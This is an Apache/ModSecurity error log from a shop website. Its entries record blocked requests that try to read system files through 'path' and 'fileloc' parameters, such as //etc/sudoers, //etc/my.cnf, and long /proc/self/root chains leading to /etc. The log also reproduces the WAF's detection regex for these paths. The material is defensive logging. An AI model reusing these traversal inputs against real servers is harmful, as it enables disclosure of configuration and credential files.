[Thu Mar 19 13:27:04.010715 2026] [:error] [pid 27293:tid 140411548894976] [client 57.141.18.103:55956] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwj2P-YZRR_7pZ7nDKfLwAAA9c"]
[Thu Mar 19 13:27:07.037199 2026] [:error] [pid 19093:tid 140411565680384] [client 57.141.18.57:56020] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwj21_V7PWP6ixUYl7QewAAApU"]
[Thu Mar 19 13:27:07.823763 2026] [:error] [pid 17653:tid 140411540502272] [client 57.141.18.29:56052] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwj28df6f5d65gmYZSMzgAAAtg"]
[Thu Mar 19 13:27:11.070138 2026] [:error] [pid 14269:tid 140411616036608] [client 57.141.18.22:56158] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwj3gbLMZ6AikZjR9VxIwAAAA8"]
[Thu Mar 19 13:27:11.988615 2026] [:error] [pid 17653:tid 140411733534464] [client 57.141.18.117:56184] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwj38df6f5d65gmYZSM0QAAAsE"]
[Thu Mar 19 13:27:12.601583 2026] [:error] [pid 31803:tid 140411674785536] [client 57.141.18.63:56198] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwj4OyqAr6etmhZHNpzhgAAAEg"]
[Thu Mar 19 13:27:14.149272 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54220] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:27:14.183305 2026] [:error] [pid 26799:tid 140411666392832] [client 57.141.18.39:56246] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwj4ta6ubjKNq_cu4ZqWgAAA0k"]
[Thu Mar 19 13:27:14.231743 2026] [:error] [pid 26799:tid 140411565680384] [client 57.141.18.50:56250] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwj4ta6ubjKNq_cu4ZqWwAAA1U"]
[Thu Mar 19 13:27:14.933831 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.54:56268] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwj4v-YZRR_7pZ7nDKfNQAAA8k"]
[Thu Mar 19 13:27:22.384793 2026] [mime_magic:error] [pid 31803:tid 140411666392832] (70014)End of file found: [client 74.7.241.31:44132] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/lib
[Thu Mar 19 13:27:22.384971 2026] [access_compat:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:44132] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/lib
[Thu Mar 19 13:27:32.665820 2026] [core:alert] [pid 30077:tid 140411548894976] [client 74.7.241.31:44134] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www
[Thu Mar 19 13:27:40.138070 2026] [proxy_fcgi:error] [pid 14269:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54784] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:27:43.378622 2026] [mime_magic:error] [pid 30077:tid 140411658000128] (70014)End of file found: [client 57.141.18.38:57162] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:28:01.069819 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55260] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:28:22.121787 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55710] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:28:43.105828 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56096] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:29:06.119895 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:56586] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:29:12.511292 2026] [mime_magic:error] [pid 27403:tid 140411691570944] (70014)End of file found: [client 57.141.18.66:59850] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:29:33.129784 2026] [proxy_fcgi:error] [pid 14269:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57206] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:29:55.909911 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.113:32942] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwkg-oXxyEfFpUF8f8gzwAAAUc"]
[Thu Mar 19 13:30:08.133643 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57940] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:30:29.958037 2026] [mime_magic:error] [pid 27293:tid 140411699963648] (70014)End of file found: [client 57.141.18.15:33758] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:30:33.224178 2026] [core:alert] [pid 31803:tid 140411557287680] [client 57.141.18.53:33860] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 13:30:47.137855 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58932] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:31:00.810587 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.243.128:54714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwkxF_V7PWP6ixUYl7REgAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:31:04.602708 2026] [mime_magic:error] [pid 27293:tid 140411557287680] (70014)End of file found: [client 57.141.18.8:34706] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:31:14.105885 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59568] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:31:27.410795 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:54714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwk31_V7PWP6ixUYl7RKwAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:31:38.125079 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60132] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:31:39.035800 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.243.128:54714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwk61_V7PWP6ixUYl7RPgAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 13:31:42.799598 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.228.61:40736] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwk7gbLMZ6AikZjR9VxoQAAAAk"]
[Thu Mar 19 13:31:47.919486 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:56578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwk8_u8EFLIOrSqIpu8owAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 13:32:02.169555 2026] [proxy_fcgi:error] [pid 19093:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60796] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:32:03.439648 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:35042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlA9a6ubjKNq_cu4ZrIAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:32:09.219723 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:33662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlCcdf6f5d65gmYZSNagAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 13:32:15.175041 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:51650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlD8df6f5d65gmYZSNbQAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 13:32:15.737779 2026] [mime_magic:error] [pid 17653:tid 140411616036608] (70014)End of file found: [client 57.141.18.76:36910] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:32:19.513139 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:36412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlE8df6f5d65gmYZSNcwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:32:24.129789 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33188] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:32:45.135367 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33842] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:32:49.877418 2026] [mime_magic:error] [pid 17887:tid 140411649607424] (70014)End of file found: [client 74.7.241.31:33584] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/log
[Thu Mar 19 13:32:55.123071 2026] [mime_magic:error] [pid 31803:tid 140411557287680] (70014)End of file found: [client 57.141.18.114:38122] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:33:07.170911 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:33:14.062557 2026] [mime_magic:error] [pid 17653:tid 140411683178240] (70014)End of file found: [client 57.141.18.53:38740] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:33:30.120069 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35236] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:33:37.468873 2026] [mime_magic:error] [pid 19093:tid 140411590858496] (70014)End of file found: [client 57.141.18.54:39558] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:33:53.055467 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35882] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:33:55.969978 2026] [mime_magic:error] [pid 26799:tid 140411590858496] (70014)End of file found: [client 57.141.18.101:40158] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:34:06.632231 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:36422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwlfuoXxyEfFpUF8f8hdQAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
